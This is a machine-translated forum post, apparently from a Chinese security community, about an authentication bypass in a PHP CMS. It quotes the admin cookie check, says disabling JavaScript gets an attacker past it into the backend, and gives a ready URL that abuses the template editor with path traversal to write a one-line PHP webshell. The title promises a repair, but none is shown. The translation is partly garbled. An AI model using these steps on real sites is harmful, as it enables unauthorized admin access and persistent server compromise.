Search for cms php bypass verification defects and repair

Author: z2681
 
 
From: 90sec
 
Admin_loginstate.php In the admin directory of the vulnerability File
 
View code
 
If (empty ($ _ COOKIE ['s _ AdminID ']) {
Echo "<script> window. location = 'admin _ login. php' </script> ";
Exit;
}
Elseif ($ _ COOKIE ['s _ Login ']! = Md5 ($ _ COOKIE ['s _ AdminID ']. $ _ COOKIE ['s _ AdminUserName ']. $ _ COOKIE ['s _ AdminPassWord ']. $ _ COOKIE ['s _ Permission ']) {
Echo "<script> window. parent. location = 'admin _ login. php' </script> ";
}
?>
 
It is easy to see that we can directly disable javascript code from entering the background for cookie verification.
 
After entering the background, let's briefly talk about the shell method.
 
/Admin/admin_template.php? Action = templist & path = ../skins/index/html/& tempname = default template & file = qingshen. php90
 
You can directly access this url and write a sentence. The directory is of course under the/skins/index/html/directory.